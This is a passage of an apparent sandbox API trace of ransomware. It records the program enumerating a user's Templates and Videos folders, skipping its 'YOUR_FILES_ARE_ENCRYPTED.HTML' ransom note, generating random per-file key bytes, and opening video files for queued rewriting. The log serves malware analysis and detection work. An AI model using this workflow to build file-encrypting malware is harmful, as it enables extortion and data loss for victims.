ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.784] GetProcessHeap () returned 0x270000 [0168.785] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.785] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0168.785] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates") returned 33 [0168.785] GetProcessHeap () returned 0x270000 [0168.785] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.785] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates" [0168.785] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*" [0168.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Templates\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23dc850, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x898f015e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Indexed Locations.search-ms", cAlternateFileName="ꅠݎ")) returned 0xffffffff [0168.785] GetProcessHeap () returned 0x270000 [0168.786] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.786] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 1 [0168.786] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos") returned 30 [0168.786] GetProcessHeap () returned 0x270000 [0168.786] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0168.786] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos" [0168.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*" [0168.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0168.786] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.786] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbeb14b30, ftCreationTime.dwHighDateTime=0x1d7de02, ftLastAccessTime.dwLowDateTime=0x856e4fb0, ftLastAccessTime.dwHighDateTime=0x1d7e2eb, ftLastWriteTime.dwLowDateTime=0x856e4fb0, ftLastWriteTime.dwHighDateTime=0x1d7e2eb, nFileSizeHigh=0x0, nFileSizeLow=0x1d2c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="-2wj_ZU_TXUboswwa.flv", cAlternateFileName="-2WJ_Z~1.FLV")) returned 1 [0168.786] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv") returned 52 [0168.786] lstrcmpW (lpString1="-2wj_ZU_TXUboswwa.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.786] PathFindExtensionW (pszPath="-2wj_ZU_TXUboswwa.flv") returned=".flv" [0168.786] lstrlenW (lpString=".flv") returned 4 [0168.786] PathFindExtensionW (pszPath="-2wj_ZU_TXUboswwa.flv") returned=".flv" [0168.786] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\-2wj_zu_txuboswwa.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0168.787] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=7468) returned 1 [0168.787] GetProcessHeap () returned 0x270000 [0168.787] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0168.790] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="7B") returned 2 [0168.790] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="FD") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="4C") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="8D") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="F4") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="A4") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="86") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="5A") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="8E") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="38") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D7") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="7D") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="F2") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="07") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="41") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F9") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="83") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="19") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A9") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="A6") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="ED") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="04") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="12") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C2") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="75") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="88") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="58") returned 2 [0168.791] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="AD") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="A7") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="7A") returned 2 [0168.792] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="36") returned 2 [0168.792] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\-2wj_ZU_TXUboswwa.flv" [0168.792] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.792] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0168.792] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="5SO4gw775L6f", cAlternateFileName="5SO4GW~1")) returned 1 [0168.792] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f") returned 43 [0168.792] GetProcessHeap () returned 0x270000 [0168.792] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.794] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f" [0168.794] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*" [0168.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0168.794] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55322b0, ftCreationTime.dwHighDateTime=0x1d7e539, ftLastAccessTime.dwLowDateTime=0x7d651b90, ftLastAccessTime.dwHighDateTime=0x1d7e6bb, ftLastWriteTime.dwLowDateTime=0x7d651b90, ftLastWriteTime.dwHighDateTime=0x1d7e6bb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.795] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f55260, ftCreationTime.dwHighDateTime=0x1d7dfeb, ftLastAccessTime.dwLowDateTime=0xc0699980, ftLastAccessTime.dwHighDateTime=0x1d7e458, ftLastWriteTime.dwLowDateTime=0xc0699980, ftLastWriteTime.dwHighDateTime=0x1d7e458, nFileSizeHigh=0x0, nFileSizeLow=0x16369, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="0cO8Ok.avi", cAlternateFileName="")) returned 1 [0168.795] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi") returned 54 [0168.795] lstrcmpW (lpString1="0cO8Ok.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.795] PathFindExtensionW (pszPath="0cO8Ok.avi") returned=".avi" [0168.795] lstrlenW (lpString=".avi") returned 4 [0168.795] PathFindExtensionW (pszPath="0cO8Ok.avi") returned=".avi" [0168.795] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\0co8ok.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0168.796] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=90985) returned 1 [0168.796] GetProcessHeap () returned 0x270000 [0168.796] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0168.801] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4A") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="7E") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="02") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="EF") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="29") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EB") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4C") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="E1") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D5") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="4D") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="61") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="04") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="18") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="16") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="86") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="92") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EA") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="ED") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="94") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="1B") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="8B") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DA") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A7") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B6") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="03") returned 2 [0168.801] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="40") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="46") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="86") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8F") returned 2 [0168.802] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0168.802] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\0cO8Ok.avi" [0168.802] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.802] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0168.802] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f01dfc0, ftCreationTime.dwHighDateTime=0x1d7dfb0, ftLastAccessTime.dwLowDateTime=0x182326d0, ftLastAccessTime.dwHighDateTime=0x1d7e609, ftLastWriteTime.dwLowDateTime=0x182326d0, ftLastWriteTime.dwHighDateTime=0x1d7e609, nFileSizeHigh=0x0, nFileSizeLow=0x1654e, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="3g39kwXbO0F.flv", cAlternateFileName="3G39KW~1.FLV")) returned 1 [0168.802] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv") returned 59 [0168.802] lstrcmpW (lpString1="3g39kwXbO0F.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.802] PathFindExtensionW (pszPath="3g39kwXbO0F.flv") returned=".flv" [0168.802] lstrlenW (lpString=".flv") returned 4 [0168.802] PathFindExtensionW (pszPath="3g39kwXbO0F.flv") returned=".flv" [0168.803] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\3g39kwxbo0f.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0168.803] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=91470) returned 1 [0168.803] GetProcessHeap () returned 0x270000 [0168.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0168.806] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F7") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="10") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="BE") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F6") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="72") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="D8") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AE") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="27") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E8") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="23") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="50") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="10") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="0C") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="19") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="93") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="AA") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0168.806] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DA") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="44") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2C") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0A") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="21") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="39") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="09") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="50") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FA") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="18") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D0") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="28") returned 2 [0168.807] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="45") returned 2 [0168.808] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\3g39kwXbO0F.flv" [0168.808] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.808] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0168.808] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdfc77380, ftCreationTime.dwHighDateTime=0x1d7d768, ftLastAccessTime.dwLowDateTime=0x7e17a9e0, ftLastAccessTime.dwHighDateTime=0x1d7e1b1, ftLastWriteTime.dwLowDateTime=0x7e17a9e0, ftLastWriteTime.dwHighDateTime=0x1d7e1b1, nFileSizeHigh=0x0, nFileSizeLow=0x4d1c, dwReserved0=0x161fafa, dwReserved1=0x0, cFileName="cBIayRuO2o1rUi4dxeN.flv", cAlternateFileName="CBIAYR~1.FLV")) returned 1 [0168.808] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv") returned 67 [0168.808] lstrcmpW (lpString1="cBIayRuO2o1rUi4dxeN.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.808] PathFindExtensionW (pszPath="cBIayRuO2o1rUi4dxeN.flv") returned=".flv" [0168.808] lstrlenW (lpString=".flv") returned 4 [0168.808] PathFindExtensionW (pszPath="cBIayRuO2o1rUi4dxeN.flv") returned=".flv" [0168.808] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0168.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\5so4gw775l6f\\cbiayruo2o1rui4dxen.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0168.809] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=19740) returned 1 [0168.809] GetProcessHeap () returned 0x270000 [0168.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0168.811] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="21") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B7") returned 2 [0168.811] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="A7") returned 2 [0168.811] wsprintfW (in: 